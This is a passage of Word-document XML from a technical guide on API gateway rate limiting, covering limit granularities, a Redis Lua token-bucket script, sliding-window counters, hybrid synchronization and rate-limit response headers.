    <w:p w14:paraId="127909BF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The introspection endpoint as a SPOF:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> If the authorization server is unavailable and the gateway has no cached result for a token, authentication fails. Mitigation: maintain a longer grace period for stale cached results when the introspection endpoint is unavailable. The stale result is better than rejecting all authenticated requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487795B0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="3441B975">
          <v:rect id="_x0000_i3827" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB66EB5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Rate Limiting — Full Internal Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C1F391" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Rate limiting at the API gateway is more complex than rate limiting in a single service because the gateway is distributed — multiple gateway instances, multiple algorithms, multiple granularities of limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9C509" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rate Limiting Granularities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F8CF6C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-IP rate limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Coarse-grained. Simple to implement. Vulnerable to IPv6 abuse (nearly unlimited IPs) and unfair to NAT'd clients (all clients behind a NAT share one IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A4450" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-API-key rate limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Tied to authenticated identity. Fair across clients. Requires authentication before rate limiting — unauthenticated requests must be IP-rate-limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5BA858" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-user rate limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Finer than API key (one user may have multiple API keys). Requires extracting user identity from the token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06563EC5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-tenant rate limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> For multi-tenant SaaS — each tenant gets a separate rate limit budget regardless of how many users or API keys they have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B2B65A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-endpoint rate limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Different limits for expensive operations (/search: 100/min) vs cheap operations (/profile: 1000/min). Implemented by defining limits per route rather than globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A69AC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Global rate limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Total traffic cap across all clients — protects the backend regardless of per-client limits. When global capacity is reached, all clients are rate-limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84B032" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hierarchical limits:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Nested limits enforced simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0368374C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E1CE0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Global:        10,000 RPS across all clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E46950B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Per-tenant:    1,000 RPS per tenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D08E67" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Per-API-key:   100 RPS per API key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3E33B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Per-endpoint:  50 RPS per API key for /search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6111CB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>All four limits are checked per request — the most restrictive one that's exceeded determines the rejection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F47DE6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed Rate Limiting — The Engineering Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EC2A4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>With N gateway instances, each maintaining local counters, the effective rate limit is N times the intended limit. Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCDB822" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Centralized Redis rate limiting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581DF725" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>All gateway instances share rate limit state in Redis. Each request atomically updates and checks the counter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F3DF5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token bucket in Redis (Lua script for atomicity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4818889D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>Lua</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703DDA1B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local key = KEYS[1]           -- rate limit key (e.g., "rl:user123:search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE52D4E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local capacity = tonumber(ARGV[1])    -- bucket capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607C799" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local refill_rate = tonumber(ARGV[2]) -- tokens per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381369C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local now = tonumber(ARGV[3])         -- current timestamp (milliseconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F18EC72" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local requested = tonumber(ARGV[4])   -- tokens requested (usually 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3388DD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="461649A5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local bucket = redis.call('HMGET', key, 'tokens', 'last_refill')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60142418" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local tokens = tonumber(bucket[1]) or capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB98ECC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local last_refill = tonumber(bucket[2]) or now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA81F66" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="28C94620" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>-- Compute tokens added since last refill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C940AB2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local elapsed = (now - last_refill) / 1000.0  -- convert to seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B3D08" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local new_tokens = math.min(capacity, tokens + elapsed * refill_rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B114B1A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="217AED34" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>local allowed = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EAA5AF" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>if new_tokens &gt;= requested then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE2CA1E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    new_tokens = new_tokens - requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670CCCC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    allowed = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D772A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128163EC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="08E30A29" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>redis.call('HMSET', key, 'tokens', new_tokens, 'last_refill', now)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09098DEE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>redis.call('PEXPIRE', key, math.ceil(capacity / refill_rate * 1000))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E969E6E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="0348B9EE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>return {allowed, math.floor(new_tokens)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18119C61" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>The entire script executes </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atomically</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> in Redis — no race conditions. The TTL on the key (PEXPIRE) automatically cleans up inactive clients' rate limit state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A90290" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sliding window counter in Redis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4508A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08228C49" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>For window size W seconds and limit L requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306C914E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="500F2D6F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>At time T, request arrives for key K:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EDBD4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  1. Remove entries older than T-W from sorted set: ZREMRANGEBYSCORE K 0 (T-W)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7954526B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  2. Count remaining entries: ZCARD K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EABD32" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  3. If count &gt;= L: reject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268F769" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  4. Add current timestamp: ZADD K T T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE86597" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  5. Set TTL: EXPIRE K W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E21CE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The sorted set stores timestamps as both score and value. Range queries remove expired entries. This is accurate but memory-intensive — each request is a separate entry in the sorted set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B3AE68" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Redis single-threaded advantage for rate limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Redis processes commands sequentially — even without Lua scripts, a sequence of commands from one client is processed without interleaving other clients' commands in between... actually, that's not true. Redis is single-threaded for command processing but multiple clients can interleave commands. Lua scripts provide true atomicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C36AC11" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local rate limiting with Redis synchronization (the hybrid approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2873CB50" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Each gateway instance maintains a local token bucket. Every N milliseconds (configurable — 50ms, 100ms, 500ms), the instance synchronizes with Redis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B8C4F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="856"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Compute tokens consumed locally since last sync.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5652A124" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="856"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Report local consumption to Redis: INCRBY global_counter local_consumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFCD864" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="856"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Fetch current global consumption from Redis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110646E7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="856"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:t>Adjust local token bucket based on global state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DAC5D7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>This reduces Redis calls from once per request to once per synchronization interval. At 1000 RPS with 100ms sync interval, Redis calls drop from 1000/s to 10/s per gateway instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE48C3E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trade-off:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Between synchronization intervals, each gateway instance allows up to limit / N_instances × (1 + slack_factor) requests independently. A brief overage is possible if traffic bursts arrive simultaneously at multiple instances. The overage magnitude depends on the sync interval and traffic concentration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E4F6C5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The adaptive synchronization strategy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> Make the sync interval inversely proportional to proximity to the rate limit. When consumption is at 10% of the limit, sync every 500ms. When at 80%, sync every 50ms. When at 95%, sync every 10ms. This ensures accuracy when it matters most (near the limit) while minimizing Redis overhead when limits aren't a concern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDBD202" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate Limit Response Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F148CE3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway should communicate rate limit state to clients so they can adapt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326DCB8A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39263643" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-RateLimit-Limit: 100          (requests allowed per window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC8CF9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-RateLimit-Remaining: 43       (requests remaining in current window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B8DDC3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-RateLimit-Reset: 1735603260   (Unix timestamp when window resets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27204940" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Retry-After: 30                 (seconds until retry is appropriate — on 429)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA6D3B3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Standardized headers (IETF draft draft-ietf-httpapi-ratelimit-headers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47143D63" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E83E41E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>RateLimit-Limit: 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D334FB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>RateLimit-Remaining: 43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A4522E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>RateLimit-Reset: 30      (seconds until reset, not timestamp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF1961D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Clients that respect these headers implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adaptive backoff</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> — they back off before hitting the limit rather than hammering until 429. This is the cooperative rate limiting model — clients and gateways work together to stay within limits rather than playing an adversarial game.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E18A37D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="58749F5C">
          <v:rect id="_x0000_i3828" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6244BACA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Request and Response Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BEC30F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
